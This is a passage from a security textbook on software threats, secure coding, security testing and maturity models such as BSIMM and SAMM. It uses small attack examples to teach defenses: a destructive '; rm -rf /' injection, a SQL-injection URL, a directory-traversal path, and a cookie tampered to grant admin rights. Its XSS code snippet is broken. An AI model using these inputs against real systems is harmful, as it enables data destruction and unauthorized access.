If the input appends another command, such as remove files recursively (; rm -rf /) then when permissions allow, the entire drive (/) could be deleted. URL injection attack: NoSQL, LDAP, URL, XML parsers, SMTP headers, other expression languages, and object mapping queries may be similarly attacked. In this URL example, a conditional is attacked, as shown here [5]: http://example.com/app/accountView?id=’ or ‘1’=‘1’

Defenses for these types of attacks is to control input. It is recommended to use a safe application programming interface (API) or Object Relational Mapping Tool, which will parameterize the interface and remove meta-characters in input. Standard tried-and-true utilities can help to prevent attacks. OWASP is an organization dedicated to free, open source, secure application code. OWASP’s Enterprise Security Applications Programmer Interface (ESAPI) includes an example validation API that defends against coded attacks. If possible, it is recommended to avoid user-supplied inserted text or dynamically-­ constructed query strings, and instead use positive input validation at the server (forcing to a set of acceptable input.) If an attack does succeed, a LIMIT SQL

21.2  Threats to Input

387

command will control the number of exposed records. Finally, any commands that allow execution by the operating system should be very much avoided in coding.

21.2.2 Control Cross-site scripting (XSS) Cross-site scripting is a common web attack, where an attack user provides data that will be executed in other users’ browsers. This can occur when an attacker injects data with embedded executable scripts into forms with prebuilt scripts which will be executed [17]. For the attack to succeed, form input is not validated at the server. In the following code snippet, the ID is requested as a parameter, but instead of the required CC input, an attack script is inserted, which sends a copy of the session cookie to the attacker’s website, and enabling the attacker to hijack the session [5]: (String) page += " ; ( ). Then it is possible to verify data type, length, syntax, and business rules for all input; but positive checks are preferred. Finally it is important to keep any libraries patched, such as XML or SOAP utilities [7]. Too ensure that a website is not infected with XSS attacks, it is possible to validate output, in addition to input. It then is necessary to specify strong character encoding on output, such as UTF-8 or ISO-8859. (These are standardized character

390

21  Understanding Software Threats and Vulnerabilities

sets: UTF-8 is an abbreviation for Unicode Transformation Format using 8 bits.) Once output can be properly validated, it is possible to use a same-origin policy. This policy ensures that all components of a web page must use the same protocol and port number, and be derived from the same host. If we compare two URLs: http://www.organization.com/directory1 and https://organization.sales.com:85/ directory3, we can see they differ in protocol (http versus https), in port number (default 80 versus 85) and in host (www.organization.com and organization.sales. com). Any single difference would violate the same-origin policy [3].

21.2.3 Authentication and Access Control This section first discusses attacks related to authentication (login-password), then to access control (permissions). The techniques to guess passwords described in other chapters apply to application software too: default or social engineered passwords, dictionary attacks, brute force attacks, and easily copied and broken password files. The best solutions to these problems include limiting failed login attempts or providing increasing delays with each failure; and storing passwords with a strong hash/salt algorithm [5]. While best practices have recommended complex passwords, changed frequently, most recommendations (including NIST) now advise that multifactor authentication ranks as more important than password complexity/changes. Techniques used to access accounts, other than password guessing, include reading passwords transmitted without encryption, or accessing a public computer with a previously-logged in account. These two methods must be countered with encrypted transmissions and idle time lockouts [5]. Changing packet contents and packet replay fall within the class of broken authentication algorithms. JavaScript tests sent to a client may be modified or not executed. JavaScript sent back to the server may likewise be changed. Figure 21.4 shows that code can be reverse engineered to learn how data is processed, then changed inappropriately. Figure 21.5 shows how a URL, which includes an account number, can simply be changed to obtain access to new accounts. To prevent guessing of account numbers and credentials, it is important to use random session numbers (not repeated or sequential), which are not listed in URLs and are closed at the end of the connection or after an idle timeout. In addition, strong input validation techniques include positive checks or allowlisting, strong typing, using primitive data types in serialization, and enforcing business rules [5]. It is particularly important to validate the input at the server, since the client may be corrupted. Another form of changing packet contents include object serialization errors, where formatted data fields are changed before transmission [5]. This affects Remote Procedure Call (RPC), authentication tokens, cookies, and HTML forms. In the following example, PHP object serialization is used to save a “super” cookie, saving the user’s user ID, role (user), and authentication credential or password hash as:

21.2  Threats to Input

391

a:4:{i:0;i:132;i:1;s:9:“Andrea";i:2;s:4:"user";i:3;s:32:“f8a93e0 98acd823e2d1ac334285fef32";}

An attacker may change the serialized object to give another person admin privileges: a:4:{i:0;i:1;i:1;s:4:“Alice";i:2;s:5:"admin";i:3;s:32:"f8a93e098a cd823e2d1ac334285fef32";}

To defend against object serialization or replay attacks, it is recommended to encrypt all cookies and transmissions, use integrity checks to detect changes, include a nonce, and log all failures. Encryption makes modifying a packet difficult, but does not prevent an attacker from trying changes. Integrity checks ensure that packets have not been modified, but cannot defend against replay. A defense against replay is the nonce, which is an active authorization ticket. The nonce is a security passcode or permission tag that limits the maximum time the user has to respond. For example, a nonce may be implemented as a sequence number that increases with each transmitted packet in a connection. CAPTCHA is an example of a nonce used for session authentication (e.g., select all bridges from these 9 photos). CAPTCHA discourages automated attacks by using tests to ensure web requests come from humans. CAPTCHA is used for public access when no login accounts exist. CAPTCHA is not required when a login-­ password or multifactor authentication is used. Other safeguard rules include that sensitive data must be configured to not be retained in web caches and that hidden webpages are not truly hidden. It may be tempting to use hidden webpage (with no obvious links) thinking that may prevent unauthorized access. However, remember that protocol sniffing is used to monitor web accesses, and can easily be replayed. It is also recommended to disable web server directory listings, e.g., for RPC or Java RMI, where possible. Finally, all errors and potential attacks should be logged. Software developers can learn from attacks, and administrators can monitor and defend against such attacks. A common and attractive form of object serialization is cross-site request forgery.

21.2.4 Recognize Cross-Site Request Forgery (CSRF) Cross-site request forgery occurs when a server provides an authentication token to a user, which an attacker copies and uses the authentication token for similar or other purposes [16]. (See Fig. 21.6.) Problems that can occur when an authentication token is pre-approved, is that an attacker can delete another user’s account, change user data, and/or update their privileges to administrator [4]. The root cause of this problem is the pre-approved nature of the authentication token, which instead should be validated on a per input basis. Complete mediation

392

21  Understanding Software Threats and Vulnerabilities

Fig. 21.6  Cross site request forgery

ensures that every request to an operating system or server is verified for authorization, regardless of the number of repeated accesses [11]. Mechanisms required to implement an active authorization token would include using a nonce to prevent replay; and using pseudorandom identifiers within a cookie for each request. These can be accomplished using an anti-CSRF package, such as OWASP CSRFGuard or ESAPI Session Management control, and testing for CSRF (e.g., by using OWASP CSRFTester) [4]. Finally, for dangerous requests, it is useful to send a separate confirmation form.

21.2.5 Minimize Access If an attacker successfully obtains entry to attack code, it will help to restrain what they can do and have access to. Therefore, limit access to privileges, resources and the operating system, according to the authorization goal of least privilege. When privileges are needed raise them; but lower them as soon as possible thereafter. Here are some important considerations [3]: • Permissions: Use authorization levels and access control to minimize permissions at all times: whether anonymous, normal, privileged, administrative, and also based on role (e.g., role-based access control). Only provide higher level access when you need it. • Resources: Keep resources such as files, devices, and communications open for the smallest period possible. When done using a resource, close it! Do not keep unnecessary resources busy or leave files open to attack. • Jail: The operating system can impose resource limits on programs, including I/O bandwidth, disk quotas, network access restrictions and a restricted file system namespace. A popular application of resource limitation is rate limiting,

21.3  Implement Security Features

393

which limits the number of transactions that can occur in a specific period (e.g., preventing breaches). • Caching: Web caches can be saved in the network or in a computer, reducing transmissions across the network for identical data; this must be prevented. Sensitive web pages should never be cached and must have an active authorization token. • Credentials: Never hardcode a login/password credential, in case the login/password is discovered by attackers.

21.3 Implement Security Features We have already described the necessity of confidentiality and integrity in authentication, but it is also necessary for all sensitive data. In addition, logging is also crucial to recognize and record attacks and sensitive transactions. Finally, there are a series of safe coding practices. The best way to ensure compliance is to have a documented coding standard and ensure everyone is trained in using the coding standard as well as secure utilities and processes. Developing secure software requires using secure software methods. Data must first be evaluated to rate its sensitivity and criticality class. There must be a sincere business need to obtain and retain data. After deciding to retain and classify data, the data must be protected. Encryption and integrity (hashing) tools or protocols should be of standardized high-security algorithms. These should be used for both storage and transmissions of sensitive data. Integrity hashes protect file transfers of code and data files from attacks like DNS spoofing or cache poisoning attacks, where file contents could be changed [3]. Session key generation must rely upon a good random number generator to create random session keys. If keys are not random, attackers will figure out the next key sequence. Encryption should be used end-to-end, such that everywhere the data is transmitted or stored, the data is safely encrypted. Logs used for audit purposes (as opposed to debug) should include [17]: identity (e.g., username or email and IP address); UTC time and date; event code, description and outcome. Important events to be logged include user authentication/authorization, changes to configuration for security or logging, and logging maintenance activities. Instead of writing security utilities, an Open Design builds on software created and shared by multiple users to withstand the test of time. This often-public software survives based on the strength of the security algorithm and correctness of implementation [11]. Secure software utilities include input sanitization software, ciphers, integrity, authentication, authorization, session management, logging, and good random number generators [3]. Use a development framework that provides solid and standard utilities for these operations. However, even tried-­and-­true open source software can get out-of-date or can encounter injected attacks. An

394

21  Understanding Software Threats and Vulnerabilities

organization is responsible for its code: use due care and due diligence to analyze and test these tools well. Any third-part software should be carefully downloaded only from reputable (preferably signed) sites and evaluated that it meets internal standards (such as recent encryption algorithms) [5]. After adopting third-party software, it is important to disable unnecessary features, remove excessive files and code, and configure it properly for security, in order to prevent unapproved use by attackers. After release, it is important to regularly monitor for vulnerabilities related to that software, and patch software as necessary. In addition to security features, it is useful for programmers to follow some lower-level programming rules, such as the rules listed below. Never Expose Internal Data Structures  Web programmers may send information within forms or encoded URLs to help servers process them once these transactions are submitted back. This information may consist of internal coding data in the form of database keys, object references or IDs, or file references. An attacker can manipulate this information within forms to directly access other records or resources [16]. To prevent attacks on integrity, perform all transaction translations at the server, and/or use strong encryption to cipher internal information. Manage Exceptions  Reliable code does not fail easily. Problems may occur due to operational failures of hardware, software components or networks, or due to permission failures or revocations, policy failures, and context invalidations, among other causes [14]. When an exception occurs, the programmer can abort, continue or commit (complete) the operation. From the user perspective, recovery is preferable and may be required for a mission critical function. Exceptions are preferably recovered at lower action-oriented levels, where the specific condition is known. If not, exceptions can be handled at a higher operational level. While automatic exception handling is preferred, a means of manual intervention may be required for mission critical code. Deciding the proper functionality during failure is best decided during the Requirements and Analysis stages. Use Static Analysis Tools  Static analysis inspects the code without execution [19]. This can occur via code inspections and/or automated testing. Automated static analysis tools provide warnings beyond what a compiler normally provides. Alternatively, some compilers have security-related options that can notify you of security vulnerabilities [3]. It is recommended to fix all warnings. These analysis tools, for example, point out variable or environment contents that may not be initialized, thereby potentially leaking previous data to unrelated users. NIST offers a Source Code Security Analyzers evaluation sheet, that lists code analysis products, their features, the programming languages they support, the most recent update date, and whether the tool is free or part of a larger package. This evaluation sheet can be found at: http://samate.nist.gov/index.php/Source_Code_ Security_Analyzers.html.

21.4 Testing Issues

395

21.4 Testing Issues Preparing test cases is important for ensuring that attacks have been remediated before code is released. Tests should be automated, but before the process of automation, it is important for tests to be carefully written and reviewed. A test plan holds a number of test cases, where each test case would test potentially for a particular set of features or tests. Table  21.2 demonstrates a sample test case for a Create Patient Information form. Test cases should specify detailed input and output (e.g., specific SQL attacks or business rule violations), which is not shown in the example below. Table 21.2  Sample test case Test case: create patient information Test case ID: 3 Test purpose:  1. Ensure a valid new client can be entered into the system, and the appropriate tabs are created.  2. Ensure a duplicate entry is not created for an existing patient.  3. Ensure invalid data is detected, including wrong data types, overflow text, overflow math numbers, blank required fields, and inappropriate data.  4. Ensure logs are created for attacks, including overflow, business rule violations and SQL errors or injection.  5. Ensure encrypted transaction log is created documenting the transaction, and the author and time of the transaction. Preconditions: The tester is logged in at the main menu. Flow of events:  1. The tester selects “Manage Patient” or as an extension to make appointment  2. The tester: enters last and first name for an existing patient and presses ‘Create’.  3. While the system finds a matching record  1. The system should display an error message: “Match Exists”, and requests the tester revise the information.  2. The tester changes the name to a new patient name.  4. The system should display multiple tabs, including Patient Information (Form 6.2, Patient Medical History (Form 6.3), and Patient Medical Information (Form 6.4).  5. The system should rename the ‘Create’ button into the ‘Save’ button.  6. The tester enters inappropriate data types according to business rules for each field of the new Patient data and presses ‘Save’.  7. The system should recognize the invalid information and gives error messages.  8. The tester enters too much information for text strings or overflow data for arithmetic fields for each field of the new Patient and presses ‘Save’.  9. The system should recognize the overflow, provide error messages, remain on the same page, and log the error(s).  10. The tester leaves required fields empty for the new patient and presses ‘Save’.  11. The system should recognize the lacking information and gives error messages.  12. The tester enters inappropriate information (violating business rules) for controlled fields of the new patient and presses ‘Save’ (e.g, illegal state, sex, number of children>10, illegal insurance, etc.) (continued)

396

21  Understanding Software Threats and Vulnerabilities

Table 21.2 (continued)  13. The system should recognize the errors and give error messages.  14. The tester enters SQL injection attack into many fields.  15. The system should recognize the attack, indicate an error, and log the specific command executed.  16. The tester enters valid information for the new patient and presses ‘Save’.  17. The system assigns the patient a patient number and displays: ‘Record Updated’  18. The system should create a Patient Plan Management (Form 6.5) tab for Patients with health plans, or a Patient Bill Management tab for Patients without.  19. The tester confirms the creation of the new tabs and that a new encrypted transaction log saved the new patient record, including who and when the transaction was saved.  20. The tester confirms that SQL injection attacks and business rule violations are logged. Business rules:  1. Name must include alphabetic characters.  2. State must be legal and zip code must be a legal zip code for the state.  3. Phone number must be 10+ numeric digits.  4. Insurance must be one of a set of accepted insurance companies, or specify ‘no insurance’.  5. Birth year must be between 1900 and the current year; birth month, day must be valid days.  6. Required fields include all fields except email, secondary phone, and if ‘no insurance’ is selected, insurance information. Postconditions:  1. The new record has been saved into the test database.  2. For patients with health plans, a Patient Plan Management tab is available with information about the Patient’s plan. For patients without, a Patient Bill Management tab is provided.  3. Logs exist for attack conditions: SQL attacks and violation of business rules.  4. An encrypted transaction log includes the new records, including who and when the transaction occurred.

Notice that the Flow of Events lines start with “The system…” or “The tester…”, ensuring that the test plan is unambiguous as to who does what. Also, the test case should be specific to the software being produced, and not for the router or O.S. (unless that is what is being tested). Test cases are introduced in this chapter, because test cases are a nice way to test for software attacks and vulnerabilities. Testing is a larger topic and will be covered more extensively in the next chapter on Software Processes.

21.5 Deployment Issues Two main issues of deployment include a secure installation, and maintenance. Even after software is deployed, the system must be supported via patching.

21.5  Deployment Issues

397

21.5.1 Validate and Control the Configuration Programs often require additional files to run properly, such as configuration or environmental files. If these files are accessible to an attacker, they can be changed, which can cause a program to operate in an unintended way. These files should be stored in a location that prevents access to users. Consider two scenarios: • A program is on a client computer, accessing files on the client computer; • A web program accesses files that are unintentionally publicly accessible (via URL). Trying to hide publicly accessible files on a server is not secure. Directory traversal is an attack where a URL is coded to access unexpected files or commands on the web server, such as www.company.com/../../cmd [3]. In each of these cases, characters may be encoded to hide their contents: %2e%2e%2f. To ensure that critical environmental files are properly stored in a secure location, programmers should use the full pathname to access the file, then validate that the file does indeed have the required minimal access permissions. These are good defenses to ensure an administrator has installed the files properly. If instead “security.dat” is specified as a pathname, indicating the file is in the current directory, this file can be replaced when the executable is run from another location. Also, there must be clear installation documentation that describe the specific paths where files are stored and that these directories shall have restricted access [3]. Finally, remember the important concept of fail secure. When a configuration error is detected, it is important to fail secure or fail closed. It may be tempting to avoid a configuration file and hardcode all necessary configurations in code. First, assume that the attacker can and will reverse engineer code and can easily learn all hard-coded secrets [3]. Second, this is a particularly bad idea if specifying a password – if an attacker finds it, every system can be broken into before software can be changed on all computers [3]. Instead, passwords should be stored in an encrypted file.

21.5.2 Questions and Problems 1. Vocabulary. Match each meaning with the correct word. Jail Test case Nonce Fail open

Test plan Static analysis Rate limiting Least privilege

Encryption SQL injection Directory traversal Fail closed

Integrity hashing Cross-site scripting Cross-site request forgery Complete mediation Attack surface analysis

398

21  Understanding Software Threats and Vulnerabilities

(a) An operating system imposes resource limits on a program, to limit I/O, disk and network resource consumption. (b) A tool which inspects code for flaws, without executing the code. (c) This attack modifies programmed database commands to include additional conditions or commands, with potential results of changing the database, gaining permissions, or divulging database information. (d) This attack inserts unauthorized scripts into databases that may infect visitors to the web server. (e) An analysis technique that considers all aspects of software exposure to determine potential vulnerabilities. (f) This attack copies an authorization ticket for reuse, replay, or to enhance privileges. (g) This attack searches for accessible web directories and files unintentionally exposed. (h) An authorization token that defends against replay. (i) This table describes purposes of a test and the steps a tester should take to execute the test. (j) This control defends against transmitted packets being modified. (k) A method that limits the rate of transactions processed, and can prevent major breaches. (l) An alternate name for fail secure. (m) An alternate name for fail safe. (n) Access rights are completely validated every time an access occurs. (o) Persons should have permissions to do the primary functions of their job duties and no more. 2. Web Research. Mitre provides a list of Common Weakness Enumerations at their site: https://cwe.mitre.org/index.html. There may be a common description for a set of CWE scenarios, which you can follow down to a detailed level. Select a Software Development CWE that interests you, and answer the following questions about it: (a) What is its CWE number and name? (b) Describe the basic attack or vulnerability. (c) Describe an example of how the vulnerability occurs. (d) Describe some mitigations to prevent or reduce the attacks effects. 3. Static Analysis Tools. NIST offers a Source Code Security Analyzers evaluation sheet, that lists code analysis products and their features. Select a language you commonly program in, and determine which tools are available for that programming language, and what features each supports. This evaluation sheet can be found at: http://samate.nist.gov/index.php/Source_Code_Security_ Analyzers.html. 4. Ladder Diagrams. Many figures in this chapter have shown transmissions between a client, server, and attacker, in order to demonstrate how an attack occurs. Develop ladder diagrams to show how the following attacks occur:

References

399

(a) Phish attack resulting in a download and use of a backdoor. (b) Password guessing attack, resulting in a successful access. The ladder diagram can be drawn as a UML Sequence Diagram or with a regular word processor. 5. Development Framework Evaluation. Evaluate your programming framework to determine which utilities are available to implement security features such as: input sanitization, encryption, integrity (hashing), authentication/authorization and logging. Indicate which security-related classes exist and document the key methods that may be useful in using these utilities. List the signatures and features of the available basic methods. 6 . Find Security Bugs. Evaluate the following sets of pseudo-code for security problems. What problems do you see, and what fixes would you recommend? Security() { String contents, environment; String spath = “config.dat”; File config = new File();       if (config.open(spath) >0) contents = config.read(); environment = config.read();    else print(“Error: config.dat not found”); } purchaseProduct() { password = “Pass123phrase”; count = form.quantity; total = count * product.cost();       Message m = new Message(name,password,product,total); m. myEncrypt(); server.send(m); }

References 1. Perlroth N (2020) This is how the tell me the world ends, p 303 2. Zivanic S, Ruvceski S, Basicevic I (2022) Network security education: SQL injection attacks. 2022 IEEE Zooming Innovation in Consumer Technologies Conference (ZINC), IEEE, pp 77–80 3. 2011 CWE/SANS top 25: monster mitigations. http://cwe.mitre.org/19/mitigations.html. Accessed 15 Nov 2014 4. Mitre (2022) CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’), Mitre Corporation, 13 Oct 2022, Taken from: https://cwe.mitre. org/data/definitions/78.html 5. OWASP (2017) OWASP Top 10 – 2017 the ten most critical web application security risks

400

21  Understanding Software Threats and Vulnerabilities

6. Abazi B, Hajrizi E (2022) Practical analysis on the algorithm of the Cross-Site Scripting Attacks. The 29th international conference on systems, signals, and image processing, IEEE, June 1–3 2022, pp 1–4 7. Wang T, Zhao D, Qi J (2022) Research on cross-site scripting vulnerability of XSS based on international student website. 2022 international conference on computer network, electronic and automation (ICCNEA), IEEE, pp 154–158 8. Mitre (2022) CWE-352: Cross-Site Request Forgery (CSRF). 13 Oct 2022, Mitre Corporation. Taken from: https://cwe.mitre.org/data/definitions/352.html 9. BSIMM (2020) Building security in maturity model, version 11, Sept 2020 10. Bryant E, Early J, Gopalakrishna R, Roth G, Spafford EH, Watson K, Williams P, Yost S (2003) Poly2 Paradigm: A Secure Network Service Architecture, Proc. 19th Annual Computer Security Applications Conference (ACSAC 2003), IEEE, 10p. 11. Conklin WA, Shoemaker D (2014) CSSLP® certification all-in-one exam guide. McGraw-Hill Education, New York, NY 12. Dukes L, Yuan X, Akowuah F (2013) A case study on web application security testing with tools and manual testing. In: Proceedings of IEEE Southeastcon. Inst. Electrical & Electronics Eng. (IEEE), http://ieeexplore.ieee.org, pp 1–6 13. Divyansh (2022) How to avoid integer overflows and underflows in C++? Geek for Geeks. 4 July 2022. From: https://www.geeksforgeeks.org/how-to-avoid-integer-overflowsand-underflows-in-cpp/ 14. Kulkarni D, Tripathi A (2010) A framework for programming robust context-aware applications. IEEE Trans Softw Eng 36(2):184–197, MARCH/APRIL 2010 15. Open Group. COE Security Software Requirements Specification (SSRS) Technical Standard Doc. Number C03 5. 16. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, November 2013. www.pcisecuritystandards.org 17. SAFECode (2011) Fundamental practices for secure software development, 2nd edn. Software Assurance Forum for Excellence in Code. 8 February 2011, www.safecode.org, pp 1–56 18. Smith RE (2012) A Contemporary Look at Saltzer and Schroeder’s 1975 Design Principles. November/December 2012, IEEE Computer and Reliability Societies 19. Simpson S (ed) (2011) Fundamental practices for secure software development, 2nd edn. SAFECode. 8 February 2011. http://www.safecode.org/publication/SAFECode_Dev_ Practices0211.pdf. Accessed 15 Nov 2014.

Chapter 22

Defining a Secure Software Process

Zatko soon learned “it was impossible to protect the production environment. All engineers had access. There was no logging of who went into the environment or what they did.... Nobody knew where data lived or whether it was critical, and all engineers had some form of critical access to the production environment.” Twitter also lacked the ability to hold workers accountable for information security lapses because it has little control or visibility into employees’ individual work computers, Zatko claims, citing internal cybersecurity reports estimating that 4 in 10 devices do not meet basic security standards. – [1, P 14] Baker vs. Twitter (Lawsuit) Complaint, Case 2:22-cv-06525 Document 1 Filed 09/13/22

Many organizations take the view that features are the most important delivery and with limited time and resources, this becomes the focus. At the end, security is added in. The problem with this approach is that deployment may occur with little to no security features. This ensures that the software is defenseless or near defenseless against attackers and data breaches are the inevitable result. Consider instead that designers and developers know standard security practices, since they were trained in security before their projects began. Security requirements are decided based on risk analysis and regulatory compliance to ensure that high priority risks are mitigated and included in the schedule. Secure designs ensure that the architecture is effective and efficient. When code is written, secure utilities are familiar to the coders and correctly used the first time. Knowledgeable testers perform competent penetration testing and use automated test tools for faster, more accurate testing. The code may still be released before all bugs are fixed, but the organization knows and approves of any security flaws that remain. While this chapter reviews secure lifecycles in general, the next chapter (Chap. 23) delves into requirements and design issues in more detail. A Secure Software Initiative is the organizational goal to improve security within the software development life cycle. This section discusses best practices when implementing a secure software initiative in an organization. First, we introduce secure software maturity models, then describe some secure software processes for agile and testing activities, and finally introduce the PCI DSS Security Software

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_22

401

402

22  Defining a Secure Software Process

Framework. The BSIMM and PCI DSS standards were developed in a cooperative way by a conglomerate of over 100 software organizations, including large corporations. (This section describes the BSIMM maturity model, generally to mid-level 2 and not the highest level 3). Regardless of whether an organization develops PCI-certified code, it is still useful to consider the process meant to protect sensitive payment card data. After all, many companies process sensitive data. Should we treat payment card data more securely than health care data, social security numbers, passport numbers, or bank account numbers? Thus, this final section provides an abbreviated overview of this well-defined and more secured standard [2].

22.1 Important Concepts Maturity models outline how many organizations achieve secure software. First, we introduce two maturity models, SAMM and BSIMM, and then present BSIMM’s high-level recommendation to address security in an organization.

22.1.1 Software Security Maturity Models Software security maturity models provides a mechanism for organizations to improve their secure software process. This is helpful in that it provides a progressive ladder of activities that can only be achieved in steps over time. Groups that develop standards for secure development, including the Building Security In Maturity Model (BSIMM; www.bsimm.com) and OWASP’s Software Assurance Maturity Model (SAMM). The BSIMM software security framework includes four domains of three practices each, giving 12 total practices as displayed in Table 22.1 [4]. The SAMM model is very similar, but follows software development stages [5]. Both BSIMM and SAMM define their maturity model with 3 levels (BSIMM: Emerging, Maturing and Optimizing), with a potentially fourth base level 0, where practices are not performed. Each maturity level defines for each practice a set of activities. This chapter emphasizes BSIMM, since it appears more periodically maintained. These maturity levels enable an organization to assess and advance its maturity level, by selecting those activities it would like to improve. BSIMM recommends that an organization choose their own path in improving security, setting goals for the areas that are the most important to improve, prioritized by the organization [4]. Therefore, it is uncommon for an organization to be fully at a specific level.

22.1  Important Concepts

403

Table 22.1  Practices of BSIMM (version 11) versus SAMM (version 2)

Building Security In Maturity Model (BSIMM) Governance Strategy & metrics Compliance & policy Training Intelligence

Secure software development life cycle touchpoints

Deployment

Attack models Security features & design Standards & requirements Architectural analysis Code review

OWASP Software Assurance Maturity Model (SAMM) Governance Strategy & metrics Policy & compliance Education & guidance Design Threat assessment Security requirements Secure architecture Implementation

Security testing

Verification

Penetration testing Software environment Configuration mgmt. & vulnerability mgmt.

Operations

Secure build Secure deployment Defect management Architecture assessment Requirements-­ driven testing Security testing Incident mgmt. Environment mgmt. Operational mgmt.

22.1.2 The Secure Software Group Software organizations have to coordinate two entities: governance, which is responsible for laying out policies, monitoring compliance, documenting risk, and communicating management direction; and engineering, which is concerned with agile, lean processes using automation to achieve rapid feature delivery as part of Development-Operations (Dev-Ops) [4]. The goals of engineering are driven by rapid delivery, error avoidance, and software resiliency, and its methods are driven by cloud’s automated, continual integration, continual delivery (CI/CD), using third party software and containers to attain feature velocity. Through CI/CD tools (including Git Hub, Git Lab and OpenShift) security research, vulnerabilities and remediations can be shared with external organizations. With competing goals, software security can be forgotten with aggressive schedules and changes in environment (including changes in personnel and third-party software). To achieve stability, it is crucial that a champion for secure software exists in executive management, to educate top management, define policy, lead and prioritize secure software, communicate issues and monitor progress via metrics [4]. The Building Security In Maturity Model (BSIMM) recommends that a senior

404

22  Defining a Secure Software Process

manager leads a specialized Secure Software Group that interfaces with other software development groups. Through this executive and his/her group, the two competing goals of governance and engineering can be resolved, in particular through risk management. The Secure Software Group (SSG) is generally a centralized group, that leads security efforts, monitors projects and ensures developer training for security [4]. This technical group also often writes security-related software, evaluates third-­ party software, and participates in design and code reviews. From a legal perspective, they may work with lawyers in identifying regulatory requirements, establishing service level agreements and contractual obligations, evaluating PII requirements, preparing a data classification system, tracking controls for compliance, and instituting thresholds for releasing code. Within the regular software groups, BSIMM recommends ‘satellite’ security champions, who can represent security interests locally to each project. To communicate with satellite staff and projects, SSG should develop a security portal listing security standards, indicate which open source software is appropriate, and establish a standards review board [4].

22.2 Secure Development Life Cycle Chapter 21 talks about specific issues related to vulnerabilities and coding. Our next chapter, Chap. 23, describes methods for requirements and design. This chapter and this section specifically provides guidelines for the secure software development process in general, including testing to ensure security. These tools and techniques become a tool chest that you can choose from to best fit your application and organizational needs. Consider that each development stage has input criteria, process and output/deliverable criteria. If the deliverable of each stage has been verified to be of good quality, then defects will not snowball into later stages and there will be less rework after release. This will save project time, improve product quality, and prevent nasty security problems after release. Mature organizations should train all their software engineers for secure development and should have a secure software standard. For those interested in becoming certified, two certs to choose from include: • CSSLP: ISC2’s Certified Secure Software Lifecycle Professional with knowledge areas in Secure Software Concepts, Software Requirements, Software Designing, Software Implementation/Coding, Software Testing, Software Acceptance, Software Deployment, Operations, Maintenance and Disposal, and Supply Chain and Software Acquisition. Further information is available at: https://www.isc2.org/csslpdomains. • ITIL (IT Infrastructure Library): This more general certification includes knowledge units in Basics, Service Strategy, Service Design, Service Transition, Service Operation, and Continual Service Improvement. Find more at http://itilexam.net.

22.2  Secure Development Life Cycle

405

22.2.1 Coding BSIMM recommends software reviews led by the Secure Software Group at the most basic maturity level, including security feature review and design reviews for high-risk applications [4]. At its most basic maturity level, BSIMM recommends automated code review tools (e.g., static analysis) as well as manual reviews of high-risk code [4]. All projects should go through code reviews. To ensure that proper reviews occur, tool mentors are assigned to guide through automated reviews and centralized reporting can verify reviews occurred.

22.2.2 Testing The purpose of the Test Stage is to verify that the code fulfills the requirements and validate that the code works as expected. The first step before testing occurs is to determine the attack surface [8]. A minimum standard of acceptance (Bug Bar) is determined and used in developing test plans. Testing plans and results should be documented as part of quality assurance. Segregation of Duties (or Separation of Duties) recommends that those who formally test products are not developers; thus a quality control (QC) or quality assurance (QA) group should instead be responsible for testing [4]. This is recommended, since developers have a primary goal of getting their code to work and quality assurance have a primary goal of finding bugs. BSIMM recommends that QA drive security feature tests, through the use of black box testing, automated testing, boundary-value or edge testing, and fuzz testing specific to the application. Automated testing is cheap to perform and is being performed by crackers. It is better to know the results first! Automated tools include vulnerability and penetration tests, for example for web security in testing SQL injection. The difference between a vulnerability test and a penetration test is that vulnerability tests look for improper configurations and attack vulnerabilities, while penetration tests actually break into the system. Other dynamic tools include fuzz testing, robustness testing, and vulnerability scanners. In some cases, test code may need to be developed, since available tools may not adequately test your configuration. Vulnerability scanners can test for web and other attacks, such as integer, float or string overflows, SQL injection and cross-site scripting [6]. In addition, insecure configuration options can cause problems, such as autocomplete enabled for forms. Fuzz and robustness testing generate a large number of inputs or interactions that can find subtle flaws that may be missed by static analysis, such as environmental problems. Fuzz testing generates random input to test handling of exceptions and incorrect input [8]. Websites require special testing for web-type attacks. Even PCI DSS mandates testing for specific attacks [23]. Special testing tools are available for websites. Web spiders are automated tools that parse website(s) to find embedded links [6]. The

406

22  Defining a Secure Software Process

web spider follows all links recursively to determine and display the full connectivity of a website. This is useful to fight cross-site scripting, when websites unknowingly are infected with unexpected links. Reliability testing ensures that the software can survive unusual conditions, such as errors or unusual operating conditions. Some software failures can impact human life: it is important to determine the failure rate particularly of mission critical functions, whose functions shall not fail. Some tools (e.g., Holodeck) can simulate faults to debug error handling [14]. Some tools perform load testing, with a load of simultaneous users, to evaluate performance and bottlenecks (e.g., Load Runner). It is also helpful to run the program under low memory conditions or insufficient privileges, and to break a connection before a transaction is completed [8]. Software may slow down but should not crash or generate incorrect results. Third party code is a quick way to coding – but can be risky. It is recommended to only select highly trusted third-party code and inspect and vet it well [12]. Code shall be minimized to include only the required features and should be well tested. High maturity levels of BSIMM [4] recommend evaluating such code within a jail or sandbox, which quarantines an untrusted program as it runs, and monitored with protocol analyzers to ensure that (for example) only strong encryption algorithms are used. Manual tests can be tailored for the specific application according to the threat model. Manual penetration testing is essential, and requires knowledgeable penetration testers [8]. Tools that can help in manual testing include proxies and vulnerability scanners, which allow dynamic packet creation. A Proxy intercepts commands and responses between the browser and the server, enabling the user to view and modify the packet before transmission [6]. BSIMM also recommends that both internal and external penetration testing is performed, and penetration testing is performed periodically [4]. Penetration testers should be provided information of the application and discovered security flaws should be tracked in the change control system. Free tools which support many web-testing features include Paros and OWASP’s Zed Attack Proxy (ZAP). Both Paros and ZAP support automated and dynamic manual testing [6]. Commercial products include Fortify and Acunetix web vulnerability scanners. Fortify supports static analysis and automated vulnerability scanning of traditional web and mobile interfaces, while Acunetix’ feature set includes HTTP, SOAP, AJAX and flash content. At the end of the testing process, the software may be certified [15]. A Bug Bar is a security threshold for release that ensures that software is not released with high risk security defects. The threshold is defined preferably at the requirements stage, and software is not released until the defined security threshold is achieved. Microsoft uses the Bug Bar standard to evaluate the effects of security defects, which they consider the most important and reliable attribute in measuring a security fault. The Bug Bar defines defect levels for each threat category as high, moderate or low. A simplified sample for the Tampering and Repudiation threat categories, related to servers, is shown in Table 22.2 [16].

22.2  Secure Development Life Cycle

407

